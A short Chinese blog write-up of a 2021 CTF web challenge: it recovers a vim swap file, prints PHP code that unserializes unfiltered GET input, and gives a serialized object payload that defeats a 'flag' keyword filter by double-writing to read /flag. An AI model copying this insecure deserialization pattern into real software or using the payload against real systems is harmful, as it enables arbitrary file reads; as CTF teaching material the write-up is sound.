WICCTF2021(津门杯)web_power_cut

2021-05-11

我因为这道题，学会了一个特别好用的“目录扫描”插件——dirsearch

说题目：
首先，打开页面是一句话——

然后用dirsearch扫描，发现swp备份文件

文件直接打开是乱码
需要用linux恢复

打开kali，vim -r index.php.swp
再次打开，是php的代码

代码主体：

<?php
class logger{
    public $logFile;
    public $initMsg;
    public $exitMsg;

    function __construct($file){
        // initialise variables
        $this->initMsg="#--session started--#\n";
        $this->exitMsg="#--session end--#\n";
        $this->logFile =  $file;
        readfile($this->logFile);

    }

    function log($msg){
        $fd=fopen($this->logFile,"a+");
        fwrite($fd,$msg."\n");
        fclose($fd);
    }

    function __destruct(){
        echo "this is destruct";
    }
}

class weblog {
    public $weblogfile;

    function __construct() {
        $flag="system('cat /flag')";
        echo "$flag";
    }

    function __wakeup(){
        // self::waf($this->filepath);
        $obj = new logger($this->weblogfile);
    }

    public function waf($str){
        $str=preg_replace("/[<>*#'|?\n ]/","",$str);
        $str=str_replace('flag','',$str);
        return $str;
    }

    function __destruct(){
        echo "this is destruct";
    }

}

$log = $_GET['log'];
$log = preg_replace("/[<>*#'|?\n ]/","",$log);
$log = str_replace('flag','',$log);
$log_unser = unserialize($log);

?>

读代码（抽时间补）

最后payload：
log=O:6:"weblog":1:{s:10:"weblogfile";s:5:"/flflagag";}
得到flag